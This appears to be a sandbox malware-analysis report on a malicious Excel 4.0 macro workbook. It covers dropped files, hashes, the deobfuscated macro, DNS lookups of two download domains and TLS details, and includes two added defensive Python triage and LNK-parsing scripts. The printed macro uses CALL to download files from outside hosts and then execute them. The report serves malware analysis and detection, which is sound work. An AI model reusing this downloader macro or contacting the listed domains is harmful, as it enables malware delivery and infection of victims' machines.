                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):115
                                                                                                                                                                                                                      Entropy (8bit):4.418133942983911
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:oyBVomxWdadAdrXVoOytdAdrXVomxWdadAdrXVov:djuadgEtdguadgy
                                                                                                                                                                                                                      MD5:1DD64E34B701C2F1258FA5053DA222D3
                                                                                                                                                                                                                      SHA1:62C41DD710409066BF7DB8B6B73E3711CD135732
                                                                                                                                                                                                                      SHA-256:B8A5C62AFDAEB5DBBDB86B394AB15E3C62E4B1C420BCBDC0A7DEBE97EED271C2
                                                                                                                                                                                                                      SHA-512:405F0C07FFC2906218C49F9E81150ED5A3E53B1A421C3F06FA338AC08571EDAF566A8E1D6DB025E549C8DE4189FD3BC00AA8D43733E9F0587E4AEB7C7A6E836B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: Desktop.LNK=0..[misc]..statistic-2070252624.LNK=0..statistic-2070252624.LNK=0..[misc]..statistic-2070252624.LNK=0..
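The Recent\*.LNK shortcuts and index.dat are Office's own most-recently-used bookkeeping, but they are useful forensic residue: the "File Type" lines above summarise the ShellLinkHeader timestamps, target length and attributes (for example length=107618, the size of the analysed workbook, and length=8192 for the Desktop folder), and the Desktop.LNK preview shows the trailing property store carrying the user's SID. The following Python is an added example, not Joe Sandbox code, that parses the fixed 76-byte ShellLinkHeader defined in MS-SHLLINK to recover those fields; the shortcut it parses is constructed from the values the listing reports, not a copy of the dropped file, and the example does not parse the variable-length ExtraData blocks (where the SID lives).

```python
"""Parse the fixed 76-byte ShellLinkHeader (MS-SHLLINK) of a Windows .LNK to
recover the ctime/atime/mtime, target size and attributes summarised in the
listing's 'File Type' line. Added example, not Joe Sandbox code; the sample
shortcut is constructed from values in the listing, not the dropped file."""
import struct
from datetime import datetime, timedelta, timezone

# {00021401-0000-0000-C000-000000000046}, serialised as it appears on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# HeaderSize, LinkCLSID, LinkFlags, FileAttributes, CreationTime, AccessTime,
# WriteTime, FileSize, IconIndex, ShowCommand, HotKey, Reserved1..3 = 76 bytes
_HDR = struct.Struct("<I16sIIQQQIIIHHII")

LINK_FLAGS = {0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
              0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
              0x40: "HasIconLocation", 0x80: "IsUnicode"}
FILE_ATTRS = {0x01: "READONLY", 0x02: "HIDDEN", 0x10: "DIRECTORY", 0x20: "ARCHIVE"}


def filetime_to_dt(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return _FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt: datetime) -> int:
    return ((dt - _FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def parse_lnk_header(data: bytes) -> dict:
    """Validate HeaderSize and CLSID, then decode the fixed header fields."""
    if len(data) < _HDR.size:
        raise ValueError("too short for a ShellLinkHeader")
    (size, clsid, flags, attrs, ctime, atime, wtime, fsize, _icon, show,
     _hotkey, _r1, _r2, _r3) = _HDR.unpack_from(data)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a ShellLinkHeader (bad HeaderSize or CLSID)")
    return {
        "flags": [n for b, n in LINK_FLAGS.items() if flags & b],
        "attributes": [n for b, n in FILE_ATTRS.items() if attrs & b],
        "ctime": filetime_to_dt(ctime),
        "atime": filetime_to_dt(atime),
        "mtime": filetime_to_dt(wtime),
        "target_size": fsize,
        "show_command": show,  # 1 = SW_SHOWNORMAL
    }


def build_lnk_header(ctime, atime, mtime, target_size, flags=0x09, attrs=0x20) -> bytes:
    """Build a header only (no IDList/StringData); flags default to
    HasLinkTargetIDList|HasRelativePath, attrs to ARCHIVE."""
    return _HDR.pack(0x4C, LNK_CLSID, flags, attrs, dt_to_filetime(ctime),
                     dt_to_filetime(atime), dt_to_filetime(mtime), target_size,
                     0, 1, 0, 0, 0, 0)


# Constructed sample using the values the listing reports for
# statistic-2070252624.LNK (ctime 2020-09-30 06:35:53, mtime/atime
# 2021-05-04 10:48:12, length 107618); treated as UTC here.
SAMPLE_LNK = build_lnk_header(
    datetime(2020, 9, 30, 6, 35, 53, tzinfo=timezone.utc),
    datetime(2021, 5, 4, 10, 48, 12, tzinfo=timezone.utc),
    datetime(2021, 5, 4, 10, 48, 12, tzinfo=timezone.utc),
    107618,
)

if __name__ == "__main__":
    for key, val in parse_lnk_header(SAMPLE_LNK).items():
        print(f"{key:12} {val}")
```

Everything after byte 76 (the LinkTargetIDList, LinkInfo with the volume serial and local path, and the ExtraData blocks including the TrackerDataBlock and the property store) is variable-length and flag-dependent, which is where a full parser earns its keep; for a quick timeline of what Office opened, the header alone gives the target size and timestamps.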
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-2070252624.LNK
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Tue May 4 10:48:12 2021, atime=Tue May 4 10:48:12 2021, length=107618, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2220
                                                                                                                                                                                                                      Entropy (8bit):4.713614328238765
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8IetxiwIzHJOyAPb+kvmDA77aB6myIetxiwIzHJOyAPb+kvmDA77aB6m:8I6xi1zH0PikyB6pI6xi1zH0PikyB6
                                                                                                                                                                                                                      MD5:7DEB29F3DC4524B664878593A87631E1
                                                                                                                                                                                                                      SHA1:D77C323719B199DC994C3229B8E8874352C5FF89
                                                                                                                                                                                                                      SHA-256:BA7107B002FC343B17543A36B93336BB1756110E8930C074F533342100132241
                                                                                                                                                                                                                      SHA-512:EDA5B454D79AF32BAC344FC7E587E0CDFD770D5552FD213B3B57268F64AE34A4D63622C7EDCB965E7FB1C9E80B1F8AA369ED53F5806903B845CAB3381A872C75
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: L..................F.... ......S......\.@....\.@..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.]....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.]....#J....................3[..j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N...R.].....Y..............>.....,...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.^ .STATIS~1.XLS..d......>Q{<.R.^.....V.....................-..s.t.a.t.i.s.t.i.c.-.2.0.7.0.2.5.2.6.2.4...x.l.s.m......._...............-.......^...........>.S......C:\Users\user\Desktop\statistic-2070252624.xlsm..0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.7.0.2.5.2.6.2.4...x.l.s.m.........:..,.LB.)...As...`.......X.......610930...........!a..%.H.VZAj...b................!a..%.H.VZAj...b...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22
                                                                                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                                      C:\Users\user\Desktop\C2C40000
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):107618
                                                                                                                                                                                                                      Entropy (8bit):7.916016112653699
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfz:nl+yo9opH8x+3xs6ZQ7
                                                                                                                                                                                                                      MD5:405ECDBABD8FD62D8C20BD4F08267DE2
                                                                                                                                                                                                                      SHA1:483D3C78AF0413586863AAFA3B08F6D6AF9C2B5D
                                                                                                                                                                                                                      SHA-256:ABAE0B65B6360E8C1423317D96F9E63098BAC4059E75333CB03A9DD3CBDAE66A
                                                                                                                                                                                                                      SHA-512:E71DB6202577C9CEEBE13C9DACE77F623D9713E2B2564F3BAF692B53D30C41052DC6661AE269F3857F2C6C8116F6BB96D4C49DFA54E66E2FE82E87D684BFCE20
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\Desktop\~$statistic-2070252624.xlsm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                                                                                      MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                                                                                      SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                                                                                      SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                                                                                      SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                      C:\Users\user\jordji.nbvt11
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):494
                                                                                                                                                                                                                      Entropy (8bit):4.962239405540505
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                                      MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                                      SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                                      SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                                      SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
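The dropped-file list above shows the pattern a practitioner should check for explicitly: `C:\Users\user\jordji.nbvt11`, the second file the macro downloads (see the `AT39&"1"` argument in the Macro 4.0 code below), is an HTML page with an iframe to a parking service rather than a PE image, so a DLL loader pointed at it has nothing to load. The following Python is an added example, not the sandbox's code: it reproduces the report's "File Type", "Entropy (8bit)" and SHA-256 fields with the standard library and adds the PE-vs-placeholder check. Its three inputs (a parking-page lookalike with a placeholder URL, a minimal fake PE header, a random blob) are constructed here and are not the real dropped contents.

```python
"""Triage of files an Office process dropped: type, entropy, hash, mismatch flags.

Added example, not part of the sandbox report. It reproduces the report's
"File Type" / "Entropy (8bit)" / SHA-256 fields with the standard library and
adds one check the report only implies: a file that a macro downloaded to be
loaded as a DLL must actually be a PE image. The three sample inputs are
constructed here (a parking-page lookalike with a placeholder URL, a minimal
fake PE header, a random blob); none is the real dropped content.
"""
import hashlib
import math
import random
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0..8.0 (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def identify(data: bytes) -> str:
    """Cheap magic-byte classification; extend as needed."""
    if data[:2] == b"MZ":
        if len(data) >= 0x40:
            e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
            if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                return "PE executable"
        return "MZ stub without PE header"
    if data[:4] == b"PK\x03\x04":
        return "ZIP container (possibly OOXML)"
    # LNK: HeaderSize 0x4C followed by CLSID 00021401-0000-0000-C000-000000000046
    if data[:20] == b"L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F":
        return "Windows shortcut (LNK)"
    head = data[:512].lstrip().lower()
    if head.startswith((b"<!doctype html", b"<html")):
        return "HTML document"
    return "data"


def triage_dropped(name: str, data: bytes, expect_pe: bool = False) -> dict:
    """Summarise one dropped file; expect_pe=True when rundll32/regsvr32 will load it."""
    ftype = identify(data)
    ent = shannon_entropy(data)
    flags = []
    if expect_pe and ftype != "PE executable":
        flags.append(f"{name}: loaded as a DLL but content is not a PE image "
                     f"({ftype}); the download most likely returned a placeholder page")
    if ent > 7.5 and ftype == "data":
        flags.append(f"{name}: high entropy ({ent:.2f}) with unknown type; packed or encrypted")
    if ftype == "HTML document" and b"<iframe" in data.lower():
        flags.append(f"{name}: HTML with an iframe, typical of domain-parking pages")
    return {"name": name, "size": len(data), "type": ftype, "entropy": round(ent, 4),
            "sha256": hashlib.sha256(data).hexdigest(), "flags": flags}


# --- constructed samples (not the real dropped files) ---------------------
HTML_PAGE = (b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\n<html><head>'
             b'<title>Contact Support</title></head><body><iframe width="100%" height="100%" '
             b'src="http://parking.example.invalid/?dn=referer_detect"></iframe></body></html>\n')
FAKE_PE = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x80)
           + b"\x00" * (0x80 - 0x40) + b"PE\x00\x00" + b"\x00" * 0x100)
_rng = random.Random(1)
RANDOM_BLOB = b"\x00" * 4 + bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    for name, blob, pe in (("jordji.nbvt11", HTML_PAGE, True),
                           ("stage2.dll", FAKE_PE, True),
                           ("C2C40000", RANDOM_BLOB, False)):
        r = triage_dropped(name, blob, expect_pe=pe)
        print(r["name"], r["type"], r["entropy"], *r["flags"], sep=" | ")
```

Run against a real sandbox drop directory, call `triage_dropped` with `expect_pe=True` for every path that later appears as a rundll32 or regsvr32 argument; a non-PE result there means the observed execution chain stopped at the loader and the real second stage was never captured.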

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                                                                                      Entropy (8bit):7.917058358399405
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                                                      File name:statistic-2070252624.xlsm
                                                                                                                                                                                                                      File size:109084
                                                                                                                                                                                                                      MD5:0fbdc8a2acd4dc782821cfa4fdf75099
                                                                                                                                                                                                                      SHA1:e407df0a3a3ceed4c3e9aed5716974a45cd5c542
                                                                                                                                                                                                                      SHA256:abd13b66e40db6ad8a4489667c1a1d58fde38e7388970bfbc4d8c7b3fb6cb04e
                                                                                                                                                                                                                      SHA512:760a54caf1a66d36e8f4e6fc20c8380cb012d7b76d24e5fd91085943da3b31a8471a2093ddc862a7fdf3da4c7ff49459f372033d72d67fef021e8025c3006502
                                                                                                                                                                                                                      SSDEEP:1536:8utuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:8kuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                                                                                                                                                                                      File Content Preview:PK..........!.t...............[Content_Types].xml ...(........................................................""...............................................................................................................................................

                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                                                                                                      Static OLE Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                                                                                      OLE File "statistic-2070252624.xlsm"

                                                                                                                                                                                                                      Indicators

                                                                                                                                                                                                                      Has Summary Info:
                                                                                                                                                                                                                      Application Name:
                                                                                                                                                                                                                      Encrypted Document:
                                                                                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
=HALT()
=4984654+9846544+468464
=CALL(Sheet2!AY107&"n",Sheet2!AY108&"A",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)
=CALL(Sheet2!AY107&"n",Sheet2!AY108&"A",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&"1",0,0)
=Sheet2!AW142()
U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets

                                                                                                                                                                                                                      May 4, 2021 13:48:32.610258102 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:33.048775911 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:33.097503901 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:33.814681053 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:33.868495941 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:41.153635025 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:41.216614962 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:50.793153048 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:50.860055923 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:57.906140089 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:58.061760902 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:58.710150957 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:58.767055988 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:59.328826904 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:48:59.493369102 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:48:59.944622993 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:00.002288103 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:00.469000101 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:00.535358906 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:00.543842077 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:00.592427015 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:01.137968063 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:01.295217037 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:01.751941919 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:01.809473991 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:02.566049099 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:02.623294115 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:03.418185949 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:03.475552082 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:03.934693098 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:03.988012075 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:16.954533100 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:17.016158104 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:49:59.038494110 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:49:59.091358900 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                      May 4, 2021 13:50:00.682821989 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                      May 4, 2021 13:50:00.747786045 CEST53509048.8.8.8192.168.2.4

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class
May 4, 2021 13:48:14.072832108 CEST  192.168.2.4  8.8.8.8  0x5fc1    Standard query (0)  industrialarttextile.com   A (IP address)  IN (0x0001)
May 4, 2021 13:48:15.396091938 CEST  192.168.2.4  8.8.8.8  0xbe1b    Standard query (0)  anaheimdermatologists.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address         Type            Class
May 4, 2021 13:48:14.254153967 CEST  8.8.8.8    192.168.2.4  0x5fc1    No error (0)  industrialarttextile.com   -      192.254.233.89  A (IP address)  IN (0x0001)
May 4, 2021 13:48:15.586093903 CEST  8.8.8.8    192.168.2.4  0xbe1b    No error (0)  anaheimdermatologists.com  -      192.185.5.2     A (IP address)  IN (0x0001)

HTTPS Packets

Connection 1 (server side listed as Source, as in the report's layout)
Timestamp: May 4, 2021 13:48:14.633714914 CEST
Source IP: 192.254.233.89    Source Port: 443
Dest IP: 192.168.2.4         Dest Port: 49733
Leaf certificate: Subject CN=mail.gdmart.com.bd; Issuer CN=R3, O=Let's Encrypt, C=US; Not Before Wed Mar 10 10:47:11 CET 2021; Not After Tue Jun 08 11:47:11 CEST 2021
Intermediate certificate: Subject CN=R3, O=Let's Encrypt, C=US; Issuer CN=DST Root CA X3, O=Digital Signature Trust Co.; Not Before Wed Oct 07 21:21:40 CEST 2020; Not After Wed Sep 29 21:21:40 CEST 2021
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Connection 2
